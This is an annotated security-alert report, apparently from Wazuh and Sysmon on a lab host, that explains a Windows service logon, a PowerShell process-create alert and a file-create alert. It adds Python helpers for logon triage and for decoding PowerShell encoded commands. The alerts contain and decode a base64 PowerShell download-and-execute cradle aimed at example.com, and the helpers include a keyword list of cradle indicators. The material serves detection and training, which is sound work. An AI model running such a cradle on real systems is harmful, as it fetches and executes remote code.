data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. 
- Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Full 4624 text. Read the blocks in order: Subject (who asked: the machine account, acting as SYSTEM), Logon Information (type 5 = service), New Logon (who got a session: SYSTEM again), Process Information (services.exe, the Service Control Manager). That combination is the SCM starting a service under LocalSystem; it is logged many times per boot and is not a user logon.

data.win.eventdata.subjectUserSid:  S-1-5-18
SID of the account that requested the logon. S-1-5-18 = LocalSystem (SYSTEM).

data.win.eventdata.subjectUserName:  ATTACKER$
Account name of the requester. ATTACKER$ is the computer account, i.e. the machine itself acting as SYSTEM.

data.win.eventdata.subjectDomainName:  WORKGROUP
Domain of the requester. WORKGROUP means the host is not domain-joined, so there is no DC-side 4768/4769 to corroborate against.

data.win.eventdata.subjectLogonId:  0x3e7
Logon session of the requester. 0x3e7 (999) is the fixed SYSTEM session.

data.win.eventdata.targetUserSid:  S-1-5-18
SID that was logged on. S-1-5-18 again: SYSTEM logging on SYSTEM.

data.win.eventdata.targetUserName:  SYSTEM
Account that was logged on: SYSTEM.

data.win.eventdata.targetDomainName:  NT AUTHORITY
NT AUTHORITY = a built-in Windows identity, not a user account.

data.win.eventdata.targetLogonId:  0x3e7
ID of the session granted. Equal to the subject's 0x3e7, so no new session was created; the SYSTEM session was reused, which is typical of service starts.

data.win.eventdata.logonType:  5
5 = Service: the Service Control Manager started a service under the listed account. Other common values: 2 interactive, 3 network, 4 batch, 7 unlock, 8 network cleartext, 9 new credentials (runas /netonly), 10 RDP, 11 cached interactive. Type 5 for SYSTEM is routine; type 5 for a normal user account is worth matching against 7045 (System log) or 4697 service installs.

data.win.eventdata.logonProcessName:  Advapi
Logon process that made the request. Advapi = a local LogonUser/CreateProcessAsUser call (services, scheduled tasks, runas); User32 = interactive desktop; NtLmSsp or Kerberos = network logons.

data.win.eventdata.authenticationPackageName:  Negotiate
Authentication package. Negotiate chooses Kerberos or NTLM; for a local service logon on a workgroup host nothing went over the network, which is why Package Name (NTLM only) is '-' in the message.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
Correlates the logon with a Kerberos TGS event (4769) on a domain controller. All zeros = no Kerberos ticket was involved, as expected for a local logon.

data.win.eventdata.keyLength:  0
Length in bits of the session key negotiated for the logon (128 for NTLMv2 and Kerberos network logons). 0 means no session key was requested, which is normal for a local service logon; it does not indicate a weak or downgraded cipher.

data.win.eventdata.processId:  0x304
PID of the process that requested the logon, in hex. 0x304 = 772.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
Process that requested the logon. services.exe is the Service Control Manager, the expected requester for logon type 5.

data.win.eventdata.impersonationLevel:  %%1833
Windows string-table reference. %%1833 = Impersonation, as the message renders it (%%1832 = Identification, %%1840 = Delegation). Delegation on a user logon means the token can be reused to reach other hosts.

data.win.eventdata.virtualAccount:  %%1843
%%1843 = No (%%1842 = Yes). A virtual account (NT SERVICE\name) would show Yes.

data.win.eventdata.targetLinkedLogonId:  0x0
For UAC split tokens, the ID of the paired limited/elevated session. 0x0 = no linked session.

data.win.eventdata.elevatedToken:  %%1842
%%1842 = Yes: the token carries full administrator rights. SYSTEM always does; for a user account, Yes means the account is an administrator and this is the elevated half of a UAC pair (see targetLinkedLogonId).

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
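The 4624 above is scored 7 on behaviour alone, yet every field says "service start as SYSTEM". The following is an added example (not part of the SOCscribe report or the Wazuh ruleset) that normalises a Wazuh-parsed 4624 the way the explanations above describe: it resolves the %%18xx placeholders, names the logon type and applies a small noise policy. PAGE_4624 is the event from this alert; CONSTRUCTED_RDP_4624 is made up for contrast. The placeholder table holds only values the alert's own message text confirms (1833 Impersonation, 1842 Yes, 1843 No) plus the standard 1832 Identification and 1840 Delegation; the noise rules are this example's own policy, not Wazuh's.

```python
"""Triage a Windows Security 4624 as Wazuh parses it (data.win.eventdata.*).

Added example, not SOCscribe or Wazuh code. PAGE_4624 is the event from the
alert above; CONSTRUCTED_RDP_4624 is constructed for contrast.
"""
import ntpath
from typing import Any, Dict

LOGON_TYPES = {
    0: "System", 2: "Interactive", 3: "Network", 4: "Batch", 5: "Service",
    7: "Unlock", 8: "NetworkCleartext", 9: "NewCredentials",
    10: "RemoteInteractive", 11: "CachedInteractive",
    12: "CachedRemoteInteractive", 13: "CachedUnlock",
}
# %%NNNN values are indexes into the Security provider's string table.
PLACEHOLDERS = {
    "%%1832": "Identification", "%%1833": "Impersonation", "%%1840": "Delegation",
    "%%1842": "Yes", "%%1843": "No",
}
BUILTIN_SERVICE_SIDS = {
    "S-1-5-18": "SYSTEM", "S-1-5-19": "LOCAL SERVICE", "S-1-5-20": "NETWORK SERVICE",
}
NULL_GUID = "{00000000-0000-0000-0000-000000000000}"

# The 4624 from the alert above (fields as Wazuh emits them).
PAGE_4624: Dict[str, str] = {
    "subjectUserSid": "S-1-5-18", "subjectUserName": "ATTACKER$",
    "subjectDomainName": "WORKGROUP", "subjectLogonId": "0x3e7",
    "targetUserSid": "S-1-5-18", "targetUserName": "SYSTEM",
    "targetDomainName": "NT AUTHORITY", "targetLogonId": "0x3e7",
    "logonType": "5", "logonProcessName": "Advapi",
    "authenticationPackageName": "Negotiate", "logonGuid": NULL_GUID,
    "keyLength": "0", "processId": "0x304",
    "processName": r"C:\Windows\System32\services.exe",
    "impersonationLevel": "%%1833", "virtualAccount": "%%1843",
    "targetLinkedLogonId": "0x0", "elevatedToken": "%%1842",
}

# CONSTRUCTED for contrast: an RDP logon to a local user from another host.
CONSTRUCTED_RDP_4624: Dict[str, str] = {
    "subjectUserSid": "S-1-5-18", "subjectUserName": "ATTACKER$",
    "subjectDomainName": "WORKGROUP",
    "targetUserSid": "S-1-5-21-1111111111-2222222222-3333333333-1001",
    "targetUserName": "Attcker1", "targetDomainName": "ATTACKER",
    "logonType": "10", "logonProcessName": "User32",
    "authenticationPackageName": "Negotiate", "logonGuid": NULL_GUID,
    "processId": "0x3e4", "processName": r"C:\Windows\System32\svchost.exe",
    "impersonationLevel": "%%1833", "virtualAccount": "%%1843",
    "elevatedToken": "%%1842", "ipAddress": "192.168.6.50", "ipPort": "52110",
    "workstationName": "WS-LAB",
}


def resolve(value: str) -> str:
    """Map a %%NNNN placeholder to its text; unknown values pass through."""
    return PLACEHOLDERS.get(value, value)


def triage_logon(ev: Dict[str, str]) -> Dict[str, Any]:
    """Normalise one 4624 and decide whether it is routine background noise."""
    logon_type = int(ev.get("logonType", "0"))
    target_sid = ev.get("targetUserSid", "")
    requester = ntpath.basename(ev.get("processName", "")).lower()
    pid_hex = ev.get("processId", "")
    out: Dict[str, Any] = {
        "logon_type": LOGON_TYPES.get(logon_type, f"Unknown({logon_type})"),
        "target": f"{ev.get('targetDomainName', '')}\\{ev.get('targetUserName', '')}",
        "impersonation_level": resolve(ev.get("impersonationLevel", "")),
        "virtual_account": resolve(ev.get("virtualAccount", "")),
        "elevated_token": resolve(ev.get("elevatedToken", "")),
        "requesting_pid": int(pid_hex, 16) if pid_hex.startswith("0x") else None,
        "source": ev.get("ipAddress", "-"),
        "kerberos": ev.get("logonGuid", NULL_GUID) != NULL_GUID,
    }
    # Noise policy (this example's own): SCM starting a service as a built-in
    # service account is logged many times per boot and needs no pivot.
    if logon_type == 5 and target_sid in BUILTIN_SERVICE_SIDS and requester == "services.exe":
        out["noise"] = True
        out["reason"] = (f"Service Control Manager starting a service as "
                         f"{BUILTIN_SERVICE_SIDS[target_sid]}; logged many times per boot")
    elif logon_type == 5:
        out["noise"] = False
        out["reason"] = "service logon with a non-built-in account; match against 7045/4697 service installs"
    elif logon_type in (3, 10) and out["source"] not in ("-", "127.0.0.1", "::1"):
        out["noise"] = False
        out["reason"] = f"{out['logon_type']} logon from {out['source']}; confirm the source host is expected"
    else:
        out["noise"] = False
        out["reason"] = "no suppression rule matched; review in context"
    return out


if __name__ == "__main__":
    for ev in (PAGE_4624, CONSTRUCTED_RDP_4624):
        t = triage_logon(ev)
        print(f"{t['logon_type']:<18} {t['target']:<22} noise={t['noise']}  {t['reason']}")
```

The page's event comes out as noise with the SCM reason; the constructed RDP logon is kept with its source address, which is the field a type 10 investigation starts from.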

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:36.655+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter. Decode the -EncodedCommand argument first (base64 over UTF-16LE text): it reads IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle that fetches a remote script and runs it in memory. Next steps: Sysmon EID 22 (DNS) and EID 3 (network) from processGuid {94294ddc-bde0-680a-d80b-000000000e00}, PowerShell 4104 script-block logs for what was actually fetched, and the parent chain (PID 16696 is itself a PowerShell with the same encoded command, so its own parent is the origin). The URL is the reserved example domain, which fits a lab test; triage it as if it were live.

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:36.655+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  111
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534436.2099830
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means eventID and the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the provider; fixed per provider ({5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon).

data.win.system.eventID:  1
Event ID within the provider. For Sysmon, 1 = ProcessCreate: a new process started, logged with its command line, hashes, user and parent. The native Security equivalent is 4688; neither ID set applies to the other provider.

data.win.system.version:  5
Version of the event template. It changes when a field is added; only relevant if a decoder breaks.

data.win.system.level:  4
ETW level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon writes everything at 4, so the level carries no signal here.

data.win.system.task:  1
Task category. Sysmon sets it equal to the event ID, so 1 adds nothing here; in the Security log it is the audit category (for example 12544 = Logon).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:34.0647314Z
Time the record was written to the event log (UTC). About 1.5 s after Sysmon's utcTime for this event and about 2.6 s before the Wazuh timestamp; both gaps are logging and collection delay.

data.win.system.eventRecordID:  286041
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the record to ETW: the Sysmon service (3712 on every Sysmon alert here), not the process under investigation; the latter is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the logging (Sysmon) process. Not investigative.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel holding the record. Export Microsoft-Windows-Sysmon/Operational (wevtutil epl) if you need the raw .evtx from this host.

data.win.system.computer:  Attacker
Host name Windows wrote into the record. It should equal agent.name; a mismatch means a forwarded event or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:32.540 ProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00} ProcessId: 2532 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00} ParentProcessId: 16696 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Full Sysmon Process Create text; the eventdata fields below are parsed from it. Note that CommandLine and ParentCommandLine are identical: parent and child are two stages of the same invocation, so the origin lies above the parent.

data.win.eventdata.utcTime:  2025-04-24 22:40:32.540
Moment Sysmon observed the process start (UTC). Use it, not the manager timestamp, for the host timeline.

data.win.eventdata.processGuid:  {94294ddc-bde0-680a-d80b-000000000e00}
Sysmon's process GUID (machine ID, start time, PID). Never recycled; use it to join this EID 1 with the process's later EID 3/11/22 events. The File created alert that follows on this page carries this same GUID.

data.win.eventdata.processId:  2532
PID of the new process. Recycled after exit; fine within one short window, otherwise use processGuid.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable. This is the genuine Windows PowerShell 5.1 location; a powershell.exe anywhere else, or a renamed copy, shows up as a mismatch with originalFileName.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the binary's resource. 10.0.26100 is the Windows 11 24H2 build line; it should match the host's OS build.

data.win.eventdata.description:  Windows PowerShell
Description from the version resource. Self-declared by the binary and trivially copied; it corroborates, never proves.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the version resource; self-declared, same caveat.

data.win.eventdata.company:  Microsoft Corporation
Company from the version resource; self-declared. Sysmon does not verify the signature in this event, so check it separately if the path or hash is unexpected.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal file name compiled into the binary. If the on-disk name in image differs from it, the file was renamed, a common evasion; here they match.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Exact command line of the new process. -NoLogo -NoProfile -EncodedCommand is the non-interactive, profile-skipping launch used by stagers; the argument is base64 over UTF-16LE text and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), i.e. download a script and run it in memory. Decode before triage; never judge the base64 by sight.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process at launch. Here the user's profile root.

data.win.eventdata.user:  Attacker\\Attcker1
Account the new process runs as, in DOMAIN\user form. The domain part equals the host name (Attacker), so this is a local account.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon-generated GUID for the logon session (machine ID, logon time, logon ID). Same value as on the parent: both processes run in the same session. It is not the Kerberos Logon GUID of Security 4624.

data.win.eventdata.logonId:  0x26584
Windows logon session ID (LUID), in hex. Equals the Logon ID in Security 4624/4634 for the user's interactive logon; 0x3e7 would be SYSTEM.

data.win.eventdata.terminalSessionId:  1
Windows session number. 1 = an interactive console or RDP session; 0 would be session 0 (services).

data.win.eventdata.integrityLevel:  Medium
Integrity level of the process token. Medium = a normal non-elevated user; High = elevated (UAC-approved administrator); System = SYSTEM. No escalation between parent and child here.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file (here SHA256 only, per the Sysmon configuration). For a Microsoft-signed powershell.exe it identifies the build, not the behaviour.

data.win.eventdata.parentProcessGuid:  {94294ddc-bddd-680a-d50b-000000000e00}
Sysmon GUID of the parent process; never reused. It equals the processGuid of the earlier File created alert on this page (PID 16696), so that PowerShell started this one.

data.win.eventdata.parentProcessId:  16696
PID of the parent at the time of the event. Recycled after exit; prefer parentProcessGuid for joins.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the parent executable. PowerShell spawning PowerShell is a common stager pattern.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line of the parent. Identical to commandLine here: the parent PowerShell (PID 16696) launched this one with the same encoded download cradle, so the origin lies one level further up; find PID 16696's own EID 1.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent process runs as. Same as the child here, so no token change between them.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
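The alert above is only as good as the analyst's decoding of the -EncodedCommand argument. The block below is an added example (not part of the SOCscribe report or the Wazuh ruleset) that pulls the base64 token out of a Sysmon EID 1 command line, decodes it as UTF-16LE and flags download-cradle indicators. ALERT_COMMAND_LINE is the command line recorded in this alert; the indicator list, the URL pattern and the function names are this example's own.

```python
"""Decode a PowerShell -EncodedCommand argument (Sysmon EID 1 / Security 4688
command line) and flag download-cradle indicators.

Added example, not SOCscribe or Wazuh code. ALERT_COMMAND_LINE is taken from
the alert above; the indicator list is this example's own.
"""
import base64
import re
from typing import Any, Dict, List, Optional

# Sysmon EID 1 CommandLine from the alert above (single-backslash form, as in
# data.win.system.message). Raw strings keep the backslashes intact.
ALERT_COMMAND_LINE = (
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r"-NoLogo -NoProfile -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)

# powershell.exe accepts -EncodedCommand and any unambiguous prefix (-e, -ec,
# -enc, ...), case-insensitively. -ExecutionPolicy and -ErrorAction cannot
# match: after "-e" the pattern requires whitespace, "c" or "n".
_ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_URL = re.compile(r"https?://[^\s'\"()]+")

# Strings that make a decoded one-liner a download-and-execute cradle.
CRADLE_INDICATORS = (
    "IEX", "Invoke-Expression", "DownloadString", "DownloadFile", "DownloadData",
    "Net.WebClient", "Invoke-WebRequest", "Invoke-RestMethod",
    "Start-BitsTransfer", "FromBase64String",
)


def extract_encoded_argument(command_line: str) -> Optional[str]:
    """Return the base64 token that follows -EncodedCommand, or None if absent."""
    match = _ENCODED_ARG.search(command_line)
    return match.group(1) if match else None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over the UTF-16LE bytes of the script text."""
    return base64.b64decode(b64).decode("utf-16-le")


def cradle_indicators(script: str) -> List[str]:
    """Indicators present in the decoded script, case-insensitively."""
    lowered = script.lower()
    return [name for name in CRADLE_INDICATORS if name.lower() in lowered]


def triage_command_line(command_line: str) -> Dict[str, Any]:
    """Decode the command line if it is encoded and summarise what it does."""
    b64 = extract_encoded_argument(command_line)
    if b64 is None:
        return {"encoded": False, "script": None, "indicators": [], "urls": []}
    script = decode_encoded_command(b64)
    return {
        "encoded": True,
        "script": script,
        "indicators": cradle_indicators(script),
        "urls": _URL.findall(script),
    }


if __name__ == "__main__":
    report = triage_command_line(ALERT_COMMAND_LINE)
    print(report["script"])
    print("indicators:", ", ".join(report["indicators"]))
    print("urls:", report["urls"])
```

The decoded script and the URL list are what to carry into the next pivots (Sysmon EID 22/3 for the host, PowerShell 4104 for the fetched content); the raw base64 on its own tells the analyst nothing.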

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:36.670+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer. Same situation as the earlier alert of this kind: the file is __PSScriptPolicyTest_*.ps1 in the user's Temp, the script Windows PowerShell writes at start-up to test AppLocker/WDAC enforcement, not a downloaded file. This time the writer is PID 2532 (processGuid {94294ddc-bde0-680a-d80b-000000000e00}), the PowerShell whose EID 1 is the preceding alert with the encoded download cradle; that alert, not this file, is the lead.

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:36.670+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  115
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534436.2107897
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means eventID and the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the provider; fixed per provider ({5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon).

data.win.system.eventID:  11
Event ID within the provider. For Sysmon, 11 = FileCreate: the process in Image created or overwrote the file in TargetFilename. Security-log IDs such as 4624 or 4688 do not apply to Sysmon events.

data.win.system.version:  2
Version of the event template. It changes when a field is added; only relevant if a decoder breaks.

data.win.system.level:  4
ETW level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon writes everything at 4, so the level carries no signal here.

data.win.system.task:  11
Task category. Sysmon sets it equal to the event ID, so 11 adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:34.2997910Z
Time the record was written to the event log (UTC). About 50 ms after Sysmon's utcTime and about 2.4 s before the Wazuh timestamp; logging and collection delay.

data.win.system.eventRecordID:  286042
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the record to ETW: the Sysmon service (3712 on every Sysmon alert here), not the process under investigation; the latter is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the logging (Sysmon) process. Not investigative.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel holding the record. Export Microsoft-Windows-Sysmon/Operational (wevtutil epl) if you need the raw .evtx from this host.

data.win.system.computer:  Attacker
Host name Windows wrote into the record. It should equal agent.name; a mismatch means a forwarded event or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:34.252 ProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00} ProcessId: 2532 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_twhlr5xs.n4e.ps1 CreationUtcTime: 2025-04-24 22:40:34.252 User: Attacker\Attcker1"
Full Sysmon File created text. The eventdata fields below are parsed from it.

data.win.eventdata.utcTime:  2025-04-24 22:40:34.252
Moment Sysmon observed the file creation (UTC); about 1.7 s after this PowerShell started (utcTime 22:40:32.540 in its EID 1).

data.win.eventdata.processGuid:  {94294ddc-bde0-680a-d80b-000000000e00}
Sysmon GUID of the creating process: {94294ddc-bde0-680a-d80b-000000000e00}, PID 2532, the PowerShell whose EID 1 is the preceding alert (the one with the encoded download cradle). This join is the whole value of the alert.

data.win.eventdata.processId:  2532
PID of the creating process at that moment. Recycled after exit; use processGuid for joins.

